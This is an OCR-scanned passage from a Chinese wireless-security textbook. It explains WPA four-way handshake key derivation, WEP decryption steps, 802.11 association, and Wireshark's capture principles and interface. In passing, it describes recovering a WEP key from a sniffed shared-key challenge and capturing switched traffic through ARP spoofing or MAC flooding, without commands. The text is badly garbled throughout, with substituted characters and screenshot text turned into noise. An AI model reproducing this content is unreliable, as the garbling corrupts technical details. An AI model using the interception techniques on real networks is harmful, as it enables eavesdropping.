STA 与 AP 分 别 计算 得 出 ，PMK 并 不 在 网 络 
中 进行 交换 。 


PTK (Pairwise Transient Key) 生成 算 
法 有 两 种 : HMAC-SHA1 散 列 算法 和 PRF-X 
散 列 算法 。 

PTK 的 计算 过 程 : PTK 是 通过 STA 与 AP 
的 四 步 握手 信息 计算 出 来 的 ， 计 算 公 式 是 
PMK+Noncel+Nonce2+AP MACT+SIA MAC 
计算 生成 ， 它 是 一 串 256 位 的 哈 希 值 ， 如 下 
图 所 示 。 


STA : :AP 
: Anonce : 


Snonce+IMIC 
GTK+MIC 


ACK 


计算 PTK 的 步骤 如 下 : 
step 加 AP 向 STA 发 送 一 个 Nonce1， 这 个 
Nonce1 是 由 AP 随机 生成 的 ， 由 于 是 AP 随机 
生成 的 ， 因 此 把 它 简 记 为 Anonce。 
STA 拿 到 Nonce1l 后 随机 生成 Nonce2， 
这 时 需要 计算 PTK 的 所 有 信息 都 以 具备 ， 此 
时 STA 可 以 计算 出 PTK。 
STA 将 Nonce2 发 送 给 AP， 由 于 
Nonce2 是 由 STA 随 机 生成 ， 因 此 把 它 简 记 
为 Snonce。 它 是 以 明文 发 送 的 ， 同 时 STA 会 
通过 哈 希 算法 ， 计 算出 PTK 的 MIC 校 验 码 并 
一 同 发 送 给 AP， 这 个 MIC 码 是 不 可 逆 的 。 
税 注 意 : 如 果 Snonce 在 发 送 过 程 中 被 算 
改 ， 此 时 AP 计算 的 PTK 将 改变 ，MIC 同 样 
无 法 匹配 ，AP 将 会 中 断 连 接 ， 这 样 的 通信 
还 是 非常 安全 的 。 


此 时 AP 也 拥有 了 计算 PTK 的 所 有 数 
据 ， 通 过 相同 的 哈 希 算法 计算 出 PTK 的 MIC 
校 验 码 ， 再 与 STA 发 送 的 MIC 校 验 码 进行 比 
较 ， 如 果 MIC 相 同 ， 证 明 STA 是 知道 PMK 的 。 
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AP 将 GTK+MIC 发 送 给 STA， 此 时 
STA 便 拥有 了 PTK 与 GTK。 

STA 回 复 一 个 ACK 数 据 包 ， 用 于 告知 
AP 已 经 准备 好 PTK， 后 续 数 据 包 可 以 使 用 
PTK 进 行 加 笑 数 据 。 


实战 演练 


实战 演练 1 一 一 WEP 的 解密 步 


熟悉 WEP 的 加 密 原 理 后 ， 再 来 了 解 一 
下 WEP 的 解密 原理 ，WEP 的 解密 还 是 比较 
简单 的 ， 它 是 加 密 过 程 的 一 个 逆序 过 程 。 

WEP 解 密 过 程 可 以 通过 下 图 来 描述 。 


0.5 


| 合并 数据 


人 


解密 过 程 可 以 通过 以 下 几 个 步骤 完成 : 
通过 数据 包 中 的 IV 与 无 线 密码 生成 
KSA.。 
通过 KSA 结 合 Key ID 生 成 本 次 加 密 数 
据 的 窗 钥 流 。 
step 较 通过 窗 钥 流 与 加 窗 数 据 异 或 ， 得 到 本 
次 解密 数据 。 
如 果 存 在 数据 包 切 片 ， 将 解密 后 的 数 
据 包 组 冻 成 原始 数据 。 
step 轿 通过 CRC32 算 法 生成 组 装 后 数据 包 的 
]ICYV。 
对 生成 的 ICV 数 据 进行 校 验 。 
实战 演练 2 一 一 无 线 通 信 的 过 程 

要 想 将 计算 机 或 手机 等 终端 设备 连接 
到 无 线 网 络 ， 必 须 经 过 3 个 过 程 ， 分 别 是 扫 
描 (SCAN) 、 认 证 (Authentication) 与 
关联 (Association) 。 经 历 这 些 过 程 后 STA 
才能 与 AP 建立 关联 ， 并 开始 通信 ， 下 图 为 
STA 与 AP 建立 关联 的 示意 图 。 
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黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


STA AP 
Discovery 选 择 AP 
(采用 侦 听 Beacon 帧 或 友 送 Probe 由 ) 


Authentication 


> 


中 SSOC1Lat10 


OO 


同 建立 Association 关 联 的 AP 通 人 入 
CC 


1. 扫描 (SCAN) 


扫描 过 程 分 为 如 下 两 种 情况 : 

(1) 车 无线 站 点 STA 设 成 Ad-hoc (无 
AP) 模式 。 

STA 先 寻找 是 否 已 有 IBSS (与 STA 
所 属相 同 的 SSID ) 存在 ， 如 有 ， 则 参加 
(join) ; 若 无 ， 则 会 自己 创建 一 个 IBSS， 
等 其 他 工作 站 连接 。 

(2) 奋 无 线 站 点 STA 设 成 Infrastructure 
(有 AP) 模式 ， 可 以 分 为 如 下 两 种 情况 。 

e 主动 扫描 方式 〈 特 点: 能 迅速 找 

到 ) ， 依 次 在 每 个 信道 上 发 送 Probe 
request 数 据 帧 ， 从 Probe Response 中 
获取 BSS 的 基本 信息 ，Probe Response 
包含 的 信息 和 Beacon 帧 类 似 。 

e 被 动 扫描 方式 〈 特 点 : 找到 时 间 较 

长 ， 但 STA 节 电 ) 。 

通过 侦 听 AP 定期 发 送 的 Beacon 帧 来 发 
现 网 络 ，Beacon 帧 中 包含 该 AP 所 属 的 BSS 
的 基本 信息 以 及 AP 的 基本 能 力 级 ， 包 括 : 
BSSID (AP 的 MAC 地 址 ) 、SSID、 支 持 的 
速率 、 支 持 的 认证 方式 ， 加 密 算法 、Bea- 
cons 帧 发 送 间 隔 ， 使 用 的 信道 等 。 

当 未 发 现 包 含 期 望 的 SSID 的 BSS 时 ， 
STA 可 以 工作 于 IBSS 状 态 ， 扫 描 阶 段 的 STA 
不 断 的 请 求 ， 通 过 AP 返回 的 帧 判断 AP 存 
在 ， 下 图 为 实现 扫描 示意 图 。 
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Probe Request 


Probe Response 


Probe Request 


Probe Response 


> 


2. 认证 

802.11 文 持 两 种 基本 的 认证 方式 : 

第 一 种 : Open-system Authentication 
《开放 型 ) ， 即 开放 型 连接 ， 下 图 为 连接 
示意 图 。 

(1) 等 同 于 不 需要 认证 ， 没 有 任何 安 
全 防护 能 

(2) 通过 其 他 方式 来 保证 用 户 接 入 网 
络 的 安全 性 ， 例 如 Address filter、 用 户 报 文 
中 的 SSID。 


STA AP 


Authentication Request 


Authentication Response 
(success) 


第 二 种 : Shared 一 Key Authentication 
(共享 密 钥 ) ， 即 共享 Key 连 接 ， 下 图 为 共 

享 Key 连 接 示 意图 。 

(1) 采用 WEP 加 密 算法 。 

(2) Attacker 可 以 通过 监听 AP 发 送 
的 明文 Challenge text 和 STA 回复 的 密 文 
Challenge text 计算 出 WEP KEY。 

男 外 ，STA 可 以 通过 Deauthentication 来 
终结 认证 关系 。 


Authentication Response 
success) 


3. 关联 (Association ) 


(1) Association。STA 通过 Association 
和 一 个 AP 建立 关联 ， 后 续 的 数据 报 文 的 收 
发 只 能 和 建立 Association 关系 的 AP 进行 。 

(2) Reassociation。STA 在 从 一 个 老 的 
AP 移动 到 新 AP 时 ， 通 过 Reassociation 和 
新 AP 建立 关联 。Reassociation 前 必须 经 历 
Authentication 过 程 。 

(3) Deassociation。STA 通 过 Deasso- 
ciation 和 AP 解除 关联 关系 ， 整 体 的 过 程 可 
以 总 结 成 以 下 三 个 步 又 : 

Probe 过 程 ， 首 先 STA 向 所 有 信道 发 出 
Probe 帧 ， 发 现 AP， 其 次 AP 应 谷 Response。 

Authentication 过 程 ， 首 先 STA 向 AP 发 
出 验证 请 求 ， 然 后 进行 认证 过 程 (这 个 过 
程 可 能 会 存在 多 个 数据 交互 ) ， 其 次 AP 响 
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应 STA 的 认证 结果 。 
Association 过 程 ， 首 先 STA 发 出 关联 
请 求 ， 其 次 AP 响 应 关联 请 求 。 

通过 以 上 三 个 步骤 后 如 果 认 证 成 功 ， 
便 可 以 开始 通信 。 下 图 为 其 中 的 通信 流程 。 


STIA ProbeRequest AP 
第 一 步 
Probe Response 
二 一 
R 


AuthenticationRequest 
OOOO 


Authentication Process 


AssociationRequest 


| 
| 
| 

AuthenticationResponse 

AssociationResponse 


6.6 “小 试 身 手 


练习 1: 认识 无 线 数据 帧 的 结构 。 
练习 2: 了 解 控制 帧 的 作用 与 工作 原理 。 
练习 3: 了 解 管理 帧 的 作用 与 工作 原理 。 
练习 4: 了 解数 据 帧 的 作用 与 工作 原理 。 
练习 5: 和 擎 握 无 线 通信 的 加 密 原 理 。 
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络 上 的 寞 第 流量 


第 7 各 ”无线 网 络 的 安全 分 析 工 具 


Wireshark (前 称 Ethereal) 是 一 个 网 络 封 包 分 析 软 件 ， 主 要 功能 是 捕获 网 络 封包 ， 
并 尽 可 能 显示 出 最 为 详细 的 网 络 封包 信息 ， 网 络 管理 员 使 用 Wireshark 可 以 检测 当前 网 络 


问题 。 


i 7.1 认识 Wireshark 


Wireshark 不 是 入 侵 检 测 工 具 ， 对 于 网 
行为 ， 不 会 产生 警示 或 是 任 
何 提示 ， 用 户 只 有 仔细 分 析 Wireshark 捕 获 的 
封包 ， 才 能 了 解 当 前 网 络 的 运行 情况 。 


Wireshark 是 使 用 比较 广泛 的 网 络 抓 包 


ore 


码 还 可 以 添加 个 性 的 功能 。 使 用 的 人 和 群 主 要 
有 网 络 管理 员 、 网 络 工程 师 、 安 全 工程 师 、 
IT 运 维 工 程 师 以 及 网 络 爱好 者 。 

在 实际 应 用 中 ， 使 用 Wireshark 可 以 进 
行 网 络 底层 分 析 、 解 决 网 络 故障 问题 、 发 现 
潜在 网 络 安 全 问题 等 。 下 面 进行 详细 介绍 : 

(1) 网 络 底层 分 析 。 通 过 Wireshark 可 
以 捕获 底层 网 络 通 信 ， 对 于 初学 者 而 言 可 
以 更 加 直观 地 去 了 解 网 络 通 信 中 每 一 层 数 
据 处 理 的 过 程 ， 如 果 想 要 成 为 一 个 网 络 工 
程 师 ， 了 解 和 熟悉 网 络 中 每 一 层 通信 过 程 
是 非常 有 必要 的 。 

(2) 解决 网 络 故障 问题 。 由 于 网 络 的 
特殊 性 ， 所 以 引起 网 络 故 障 的 方式 也 是 多 
样 的 ， 通 过 Wireshark 可 以 很 好 地 检查 网 络 
通信 的 各 个 环节 ， 精 确定 位 到 具体 发 生 故 
障 的 节点 以 及 可 能 发 生 故 障 的 区 域 。 

(3) 发 现 潜在 网 络 安全 问题 。 通 过 
Wireshark 对 网 络 数据 包 分 析 ， 可 以 发 现 
网 络 中 潜在 安全 问题 ， 例 如 : ARP 欺骗 、 
DDOS 网 络 攻击 等 。 


7.1.2 抓 包 原 理 


Wireshark 是 一 个 路 平台 抓 包 软 件 ， 可 
以 很 好 地 工作 在 Windows 系 统 、MacOS 系 
统 、Linux 以 及 Unix 系 统 平台 ， 也 正 是 这 样 
的 路 平 台所 以 受到 使 用 者 的 追捧 。 

Wireshark 为 什么 可 以 抓 到 网 络 包 ， 可 
以 从 网 络 原 理 与 底层 原理 两 方面 来 分 析 。 


1. 网 络 原 理 


网 络 原理 是 在 何 种 网 络 环境 下 进行 
抓 包 ， 这 是 抓 包 的 前 提 ， 其 中 分 为 三 种 情 
况 ， 即 本 机 环境 、 集 线 占 环境 、 交 换 机 
环境 。 

(1) 本 机 环境 。 本 机 环境 主要 针对 流 经 
本 机 网 卡 的 数据 包 。 下 图 为 抓 包 示意 图 。 


Wireshark 


(2) 集线器 环境 。 这 种 情况 在 网 络 中 
有 多 人 台 主机 ， 多 人 台 主机 通过 集线器 进行 网 
络 通信 ， 集 线 器 属于 物理 层 设 备 ， 从 茶 一 
个 接口 接收 的 数据 包 ， 会 被 集线器 从 其 他 
所 有 接口 转发 出 去 。 利 用 集线器 的 这 个 原 
理 ， 通 过 PC1 进行 抓 包 便 可 以 抓 取 整 个 局 
域 网 的 数据 。 下 图 为 抓 包 示 意图 。 
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(3) 交换 机 环境 。 集 线 右 的 最 大 缺 反 在 于 使 用 集 线 占 的 整个 局 域 网 属于 一 个 “冲突 域 ”， 
而 且 随 看 终 亲 数量 的 增加 ， 冲 突 的 频率 也 越 来 越 高 ， 通 信和 质量 严重 下 降 ， 而 交换 机 每 一 个 
接口 属于 一 个 单独 的 “冲突 域 ”， 整 个 局 域 网 被 分 割 为 很 多 小 的 “冲突 域 ”， 通 信 质 量 大 
大 提高 。 

交换 机 环境 实现 抓 包 可 以 分 为 三 种 形式 ， 分 别 是 端口 镜像 、ARP 欺 骗 和 MAC 汉 洪 。 

(1) 站 口 镜像 。 在 交换 机 网 络 中 将 所 有 通过 交换 机 中 转 的 数据 包 ， 全 部 都 复制 一 份 流 
经 一 个 并 口 ， 这 个 就 是 亲口 镜像 ， 如 下 图 所 示 。 


(2) ARP 欺骗 。 在 交换 机 中 保存 了 一 份 MAC 地 址 表 ， 其 中 包含 局 域 网 中 各 个 主机 
MAC 地 址 ， 通 过 PC1 发 送 ARP 地 址 欺骗 可 以 将 局 域 网 中 所 有 MAC 地 址 都 改写 为 PC1 的 
地 址 ， 此 时 所 有 数据 都 将 流 经 PC1， 再 由 PC1 进行 转发 由 此 实现 抓 包 ， 如 下 图 所 示 。 


pC1 “ee 各 《过 六 》: 我 是 TPY， 对 EDMyc1 。。 ARP 交 次 (广播 ) : 认 是 IP3- 认 志 特 IAC 地 址 告 如 我 pC2 


@ 
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Es 


卫 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


(3) MAC 泛 洪 : 通过 PC1 发 送 大 量 MAC 地 址 信息 的 垃圾 数据 包 ， 导 致 交换 机 MAC 
地 址 表 爆 表 ， 当 交换 机 没有 MAC 地 址 表 时 ， 流 经 交换 机 的 所 有 数据 都 会 以 广播 的 形式 发 


送 ， 如 下 图 所 示 。 


泛 洪 垃圾 包 ， 产生 大 量 MAC 地 址 


Wireshark 


2. 底层 原理 


Wireshark 抓 包 的 底层 原理 ， 如 下 图 
所 示 。 


GTK 1/2 


| Protocol - Tree | 
Dissectors 
| Plugins | 


Wireshark 抓 包 搬 层 原 理 示 意图 中 的 主 
要 内 容 介绍 如 下 : 

(1) Win/libcap。 这 是 Wireshark 抓 包 
时 所 依赖 的 库 文 件 ， 也 是 Wireshark 最 核心 
最 底层 的 文 持 库 。 

(2) Capture。 捕 包 引 擎 ， 利 用 Win/lib- 
pcap 从 底层 抓 取 网 络 数据 包 ，Wimlibpcap 
提供 了 通用 的 抓 包 接口 ， 能 从 不 同类 型 的 
网 络 接口 〈 包 括 以 太 网 、 令 牌 环 网 、AITM 
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网 等 ) 获取 网 络 数 据 。 

(3) Wiretap。 格 式 支 持 ， 从 抓 包 文件 
中 读 取 数据 包 ， 文 持 多 种 文件 格式 。 

(4) Core。 核 心 引 擎 ， 通 过 函数 调用 将 
其 他 模块 连接 在 一 起 ， 起 到 联动 调度 的 作 
用 ， 其 中 还 包括 一 个 Epan( 包 分 析 引 擎 ) ， 
该 Epan 可 以 将 各 种 获取 的 数据 包 进 行 分 类 
解析 。 

(5) Protocol-Tree。 保 存 数据 包 的 协议 
信息 , Wireshark 的 协议 结构 采用 树 形 结构 ， 
解析 协议 报 文 时 只 须 从 根 节 点 通过 函数 句 
柄 依次 调用 各 层 解 析 函 数 即 可 。 

(6) Dissectors 。 在 Epan/disserctor 目 录 
下 ， 各 种 协议 解码 器 ， 文 持 700 多 种 协议 解 
析 ， 对 于 每 种 协议 ， 解 码 器 都 能 识别 出 协议 
字段 (field) ， 并 显示 出 字段 值 (field val- 
ue) ， 由 于 网 络 协议 种 类 很 多 ， 为 了 使 协议 
和 协议 间 层 次 关系 明显 ， 对 数据 流 里 的 各 
个 层次 的 协议 能 够 逐 层 处 理 ，Wireshark 系 
统 采 用 了 协议 树 的 方式 。 

(7) Plugins。 一 些 协议 解码 器 以 插件 
的 形式 实现 ， 源 码 在 plugins 目录 。 


(8) Display-Filters。 显示 过 滤 引擎 ， 
源码 在 epan/dfilter 目录 。 

(9) GTK1/2。 图 像 处 理工 具 ， 处 理 用 
户 的 输入 输出 信息 。 


7.1.3 ”基本 界面 


使 用 Wireshark 抓 包 软 件 先 要 从 它 的 界 
面 入 手 ， 其 主 界面 包括 工具 栏 、 快 捷 荣 单 、 
第 选 过 滤 、 功 能 显示 窗口 以 及 任务 栏 等 。 

打开 Wireshark 抓 包工 具 ， 单 击 “ 应 
用 程序 ”下 拉 瑟 单 ， 从 中 选择 “09- 咒 探 / 
欺骗 ”菜单 项 ， 在 弹出 的 沫 单 中 可 以 看 到 
Wireshark 图 标 ， 如 下 图 所 示 。 


应 用 程序 ~ 位 置 


- 信息 收集 


rT wawoo 
$e 


Ta driftnet 


- 漏洞 分 析 
03 - Web 程 序 ettercap-g... 
04 - 数据 库 评估 软件 

hamster 
05 - 密码 攻击 
06 - 无 线 攻击 macchanger 
UD LS% LX TO 
逆向 工程 
08 - 漏洞 利用 工具 集 


09 - 嗅 探 /欺骗 


mitmproxy 
netsniff-ng 


responder 


- 权限 维持 
- 数字 取证 


- 报告 工具 集 


单 击 Wireshark 图 标 便 可 以 打开 Wireshark 
抓 包 软 件 。 下 图 为 其 工作 界面 。 


Wireshark 网 络 分 析 只 ___r 菜单 栏 OQO0Q 
文件 人 E)】 编辑 [四 ”视图 [V) 跳 转 (G) 拥堵 (分 析 从 ) 嫩 计 (5S) 电话 (] 无 厂 (Wj) 工具 (T) 帮助 (H] 
A 项 © La x 4 9 如 ~ pp “ 翅 = 三 + 一 ”快捷 方式 


wireshark 


欢迎 使 用 Wireshark 功能 界面 


用 户 指导 Wiki -问题 与 解答 ”邮件 列 家 
任务 栏 运行 Wireshark2.6,31Git v2.6,3 packaged a5 2.6,3-1), 


已 准备 好 加 款 吕 拥 著 无 分 坦 proflle: Default 


如 果 已 经 进行 了 抓 包 操作 ， 当 打开 一 
个 数据 包 后 ， 其 工作 界面 如 下 图 所 示 。 


第 7 章 ”无线 网 络 的 安全 分 析 工 具 


wep-Ol.cap 打开 的 文件 信息 @Oe@ 
文 性 [F| 炉 辑 (E) 视图 (Vj 喷 转 [G】 钴 获 问 分析 (A) 锯 计 (5) 电话 ty) 无 线 (W] 工具 (开国 (H) 
Fo 加 市 = 和 


16 
412 
a8 Mus 


3 2018-10-69 965:06:01.931 
4 26183-16-88 65 ;8686:61.332 
5 2018-10-88 85 :090892,0184 weile_ Bc:1ig'a2 (bA:15,13:8cC';190;a2) (TA) 
6 2010-16-66 65:66:02.9194c6 NuaweliTe Bc:10:a2 (ba4:15:13:0c:10:62) (TA) 
7 2618-168-68 65:68:92.619988 HUAweiTe BC:16:82 (ba:15:13:8cC:16:a2) (TA) 


obi_ ba:61:03 (28;7a: 
voMobi ba:61:03 (20:fa: 
omobi ba:61:63 (283:fa: 

hy Are's 


AA AS'AR"A? cA 
Fram 3 10 bytes on wire (126 bits), 10 bytes capEure 
r IEEE 892.11 Request-to-send, Flags: 
Type/Subtype: Request-to-ser woO01 
» Frame Control Field’: xb408 
,666 0608901 1616 69666 = 0 
/ Tp i 
全 到 wep-01 cap 


下 面 重 点 介绍 Wireshark 工 作 界 面 中 和 党 
用 沫 单 : 

(1) 文件 染 单 。 文 件 沫 单 主要 负责 打 
开 已 经 抓 取 的 数据 包 、 最 近 打 开 的 数据 包 
合并 数据 包 、 导 入 导出 特定 数据 包 。 这 个 
在 后 面 还 会 重点 讲解 ， 这 里 只 对 界面 做 简 
单 了 解 。 下 图 为 文件 沫 单 结构 。 


打开 Ctrl+O 

打开 最 近 
合并 (M)... 

从 Hex 转 储 导入 (1)... 
关闭 


VY 数据 包 解 析 窗 口 
uration; 416 microscconds 

eopiver adijress p-LinkT 23:080:73 (ff4:83':00d:33:00:73) 

Transnitter address: LiteonTe b91956:5b (58:860:e83:b9:93:5b) 


b4 B80 ae el f4 &3 cd 33 £8 735 3 b9 88 Sb 3 “S 


Xx [ 
-~ ”数据 具体 字段 


分 组 信息 显示 


| 分 肯 : 1772 , 已 显示 : 17721100.0%] | Profile: Default 


Ctrl+W 


另存 为 (A)... Ctrl+Shift+S 
文件 集合 : 
导出 特定 分 组 ... 

导出 分 组 解析 结果 ; 


导出 PDU 到 文件 .. 

导出 SSL 会话 密 铀 .. 

导出 对 象 

$#JED(P).. Ctrl+P 
”退出 Ctrl+Q 


(2) 编辑 菜单 。 编 辑 沫 单 主 要 负责 对 
数据 包 分 类 标记 ， 以 及 在 抓 包 过 程 中 按照 
时 间 大 小 进行 分 包 存 储 ， 还 有 整个 软件 的 
首选 项 也 在 编辑 菜单 中 ， 如 下 图 所 示 。 
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黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


复制 》 v| 主 工 具 栏 (M) 
Q 查找 分 组 (F).. Ctrl+F Vv| 过 滤器 工具 栏 (F) 
查找 下 一 个 (N) Ctrl+N 无 线 工具 栏 山 
查找 上 一 个 (v) Ctrl+B 了 状态 栏 IS) 
标记 /取消 标记 分 组 (M) Ctrl+M 全 屏 (F) F11 
标记 所 有 显示 的 分 组 Ctrl+Shift+M 了 分 组 列表 () 
v 分 组 详情 (D) 
v 分 组 字 节 流 (B) 
忽略 /取消 忽略 分 组 册 Ctrl+D 时 间 显 示 格式 ([D) 
解析 名 称 » 
缩放 (2 ; 
设置 /取消 设置 时间 参考 Ctrl+T 
展开 全 部 (E) Ctrl+Right 
收 起 全 部 (A) Ctrl+Left 
时 旧 ] 平 移 ... Ctrl+Shift+T 硅 着 色 分 组 列表 
分 组 注释 .. Ctrl+Alt+C 着 色 规 则 (C)... 
Delete All Packet Comments 对 话 着 色 
配置 文件 .… Ctrl+Shift+A 重 置 布 司 Ctrl+Shift+W 
首选 项 EP}- shhh 至 调整 列 帘 Ctrl+Shift+R 
、 内 部 ; 
(3) 捕获 菜单 。 捕 获 菜 单 用 于 设置 捕 ee 
获 规 则 ， 其 中 选项 菜单 可 以 设置 捕获 的 网 重新 载 入 为 文件 格式 /捕获 Ctrl+Shift+F 
加 重新 加 载 (R) Ctrl+R 


卡 ， 还 可 以 设置 捕获 规则 ， 如 下 图 所 示 。 
(6) 统计 菜单 。 统 计 菜单 可 以 通过 对 
久 选项 (D).. Ctrl+K 


站 开始 G i 已 有 数据 进行 图 形 化 数据 分 析 ， 这 个 功能 
对 于 分 析 大 量 数据 是 非常 有 帮助 的 ， 如 下 


刷新 接口 列表 F5 


(4) 分 析 菜单 。 分 析 菜 单 针对 已 经 获 
取 的 数据 包 进 行 分 析 ， 通 过 制定 相应 的 规 
则 得 分 数据 包 ， 如 下 图 所 示 。 
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显示 过 滤器 宏 (M).. 

作为 过 滤器 应 用 ; 
准备 过 滤器 ; 
对 话 过 滤器 ; 
启用 的 协议 .… Ctrl+Shi 代 +E 
解码 为 (A)... 

重新 载 入 Lua 插件 Ctrl+Shift+L 
SCTP » 
追踪 流 ) 


专家 信息 

(5) 视图 沫 单 。 视 图 菜单 主要 是 针对 
软件 中 的 视图 显示 进行 设置 ， 重 点 需要 关 
注 的 是 解析 名 称 、 列 显示 中 的 着 色 规 则 ， 
如 下 图 所 示 。 


图 所 示 。 


捕获 文件 属性 

已 解析 的 地 址 
协议 分 级 (P) 

对 话 

端点 

分 组 长 度 

I/O 图 表册 

服务 响应 时 间 

DHCP (BOOTP) Statistics 
ONC-RPC Programs 
29West 

ANCP 

BACnet 

Collectd 

DNS 


Ctrl+Alt+Shift+C 


流量 图 
HART-IP 
HPFEEDS 
HTTP 

HTTP2 
Sametime 
TCP 流 图 形 
UDP 多 播 流 
F5 

IPv4 Statistics 
|Pv6 Statistics 


7.2 ”开始 抓 包 


通过 前 面 的 学 习 ， 相 信 读 者 对 Wireshark 
有 了 一 个 基本 的 了 解 ， 下 面 针 对 如 何 抓 取 数 
据 以 及 如 何 对 数据 过 滤 进 行 讲 解 。 


7.2.1 快速 配置 


Wireshark 的 特点 是 简单 易 用 ， 通 过 简 
单 的 设置 便 可 以 开始 抓 包 ， 甚 至 只 须 选 择 
一 个 网 卡 后 ， 单 击 “ 开 始 ” 按 钮 ， 便 可 以 
实现 快速 抓 包 。 


1. 抓 包 操作 


具体 操作 步骤 如 下 : 
打开 Wireshark 抓 包工 具 ， 在 界面 “ 捕 
获 ” 功 能 选项 中 ， 可 以 对 捕获 数据 包 进 行 
快速 配置 ， 如 果 网 卡 中 产生 数据 ， 会 在 网 
卡 的 右 侧 显示 折线 图 ， 如 下 图 所 示 。 


.使 用 这 个 过 滤器 : | 内 | Enter a capture filter .. 
wlanOmon 
any 
Loopback: lo 


wlano 
nflog 


双击 选中 的 网 卡 ， 便 可 以 开始 抓 包 ， 
此 时 “开始 ”按钮 变 成 灰色 ，“ 停 止 ” 按 
钮 与 “ 重 置 ”按钮 可 选 。 下 图 为 Wireshark 
工具 抓 取 的 数据 信息 。 


| 


正在 扩 芍 wtan0mon OO@0 
文 性 任 ) 编 畔 候 ) 视图 (VW) 路 圭 [S) 拉 苇 (QO ”分 析 [ 和 人 缔 计 全 电 秋生 元 二 (WwW 工 其 [Ti 玫 助 H) 
四 0 网 A rk. wm aaa 下 
pply o dispiar filter ' E3 -| 表 这 式 - + 
No, Tne Source Destination ~ 
S1.9345,. Munweile 7c:fe:15 (e4:00:a3:7c:fe:15) (TAN) Fujit b (8690-60:9e: 
4788 2018"18"16 64:03:54.9359, HuawelTe 7c:fe:15 (e4:69:a3:7c:fe:45) (TAN)} Fuyjit 196:89:6¢:72 
1789 2018-198-10 64:;03:;541,9446, Fujit 2:ab:20 (00:60;00;72 
1798 261B8-19-19 94:93:51.9529. Huawe (a8:db:59 
| (96:66:G9e: 


1791 2618-16.36 64:93:54.9657. Fujitsu 72:ab:29 :89 : 72:1 
1792 2615-16.19 64;03;51,9687, HuawciTe_ 7c:;fe;15 (64:;68:a3;70:fe;15) (7T,) Fujitsu 72:ab;20 (00:00;06;72;1- 


» Framw 1; 28 bytes on wire (224 bits), 26 bytes captur ed (224 bits) on inlerface 6 
» Radioran Hender vp, Lenprh 18 

» B02,11 radio infornatlon 

» TEEE 802.11 Mknowledyenment, Flags; s.r... 

OH 09 68 12 66 ze 48 9 6 89 82 99 99 9 ep 加 el " [| 


B68 86 dda 86 6B 66 #8 ob 59 32 94 57 


7 mian0morc <live caplureinprogress> 分 组 ; 1792 -已 是 示 ; 1792(100.0%) Profile; Default 


向 提示 : 抓 包 一 旦 开始 ， 默 认 数 据 包 显 
示 列 表 会 动态 刷新 最 新 捕获 的 数据 。 单 去 
“停止 ”按钮 可 以 停止 对 数据 包 的 捕获 ， 
此 时 状态 栏 会 显示 当前 捕获 的 数据 包 数 量 
及 大 小 。 


第 7 章 ”无线 网 络 的 安全 分 析 工 具 一 全 


2. 数据 包 显 示 列 


默认 情况 下 ，Wireshark 会 给 出 一 个 初 
始 数据 包 显 示 列 ， 如 下 图 所 示 。 


No me sare Destinat Ion Protecal Lenagth lnpp 


122 6d4:-142:42.69953892BB 34 Request"to"send, Flags=... 
123 04:12:41, 1796773892 34 Request-to-send, Flags=... 
1 -12:41.798621624 HuweiTe TC 1 on _d8 9 5 二 
125 64:12:41.711347375 Guangdon ee 

0 4 :041,714919849 


34 Request "to.send, Flays=... 
dB:cec:0.. . 28 Acknowledgcement, Floags=... 
GURIKKIOI dd: ve 9, Ba2,11 S Ackiogwl ydgmsent, Flaus=. . 


主要 内 容 介绍 如 下 : Ty 


(1) No。 编 号 ， 根 据 抓 取 的 数据 包 自 
动 分 配 。 

(2) Time。 时 间 ， 根 据 捕 获 时 间 设 定 
该 列 。 

(3) Source: 源 地 址 信息 ， 如 果 数 据 包 
包含 源 地 址 信息 ， 例 如 IP、MAC 等 ， 这 类 
信息 会 显示 在 这 列 当 中 。 

(4) Destination。 目 的 地 址 信息 ， 同 源 
地 址 类 似 。 

(5) Protocol。 协 议 信 息 ， 捕 获 的 数据 
包 会 根据 不 同 的 协议 进行 标注 ， 这 列 显 示 
具体 协议 类 型 。 

(6) Length。 长 度 信息 ， 标 注 出 该 数据 
包 的 长 度 信 息 。 

(7) Inof。 
的 一 个 解读 。 


3. 修改 显示 列 


默认 的 显示 列 可 以 修改 ， 在 实际 数据 
分 析 当 中 ， 根 据 需 要 可 以 修改 显示 列 的 项 
目 ， 具 体操 作 步 又 如 下 : 
选中 需要 加 入 显示 列 的 子 项 ， 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “应 用 为 列 ” 菜 
单 命 令 ， 如 下 图 所 示 。 


言 已 ，Wireshark 对 数据 包 


文 忻 ({F) 编辑 [E) 视图 (Y) 跳 转 (G) 捕获 (C) : 
和 > rp i 展开 全 部 (E) 
oR wassw 
由 | Apply a display filter ... <Ctrl-/> -a 
U0 | “应 用 为 列 
No. Time jd ou 作为 过 滤器 应 用 
121 64:12:41.688209687 42: We 
122 04:12:41.699530208 Shen ”准备 过 滤器 b 
pt at 
:12:41., Uaw ee 
125 84:12:41.711347375 用 过 滤器 着 色 
126 94:12:41.714919849 追踪 流 
下 
~ IEEE 892.11 Acknowledgement, Flags 复制 
Type/sSubtype: Acknowledaement (6 显示 分 组 字 节 .. 
-= Frame Control Field DOxc4QO 二 
.i 00 = Version: 0 导出 分 组 子 凶 流 (B).. 
-i YE = Control frar Wiki 协 议 页 面 
1161 .... = Subtype: 13 ee 
» Flags: 90x69 过 滤器 字段 参考 
.0900 g000 0000 9999 = Duration: 协议 首选 项 


109 


二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


显示 列 中 会 加 入 新 列 ， 这 样 针 对 特殊 协议 分 析 全 \ 
此 时 显示 列 中 会 加 入 新 列 ， 这 二 特殊 协议 分 析 会 编辑 列 
ae 助 ， 如 下 图 所 孝 适应 内 容 
站 9 图 开 人 小 0o 
Neo. Time ” Source Destination Protocol Length 让 Info N 
121 B4:12:41.6B8269687 42:31:3c:e1:dB:69 Broadcast 862.11 461 Management fr.. Beacon frame, V 0. 
122 064:12:41,699536288 shenzhen_2f:7a:9,, BbkEduca_00:a4:2,,, 882.,11 34 Control frame Request-to-send, 
123 B84:12:;41.786773892 HuaweliTe_7cife:1.. Guangdon_d8:ec:9.. 882.11 34 Control frame Reguest-to-send, V Time 
124 BA:12:41.788821624 HuaweiTe rclfe:1.. Guangdon dB8:ec:9.. 882.11 34 Control frame Request-to-send, 
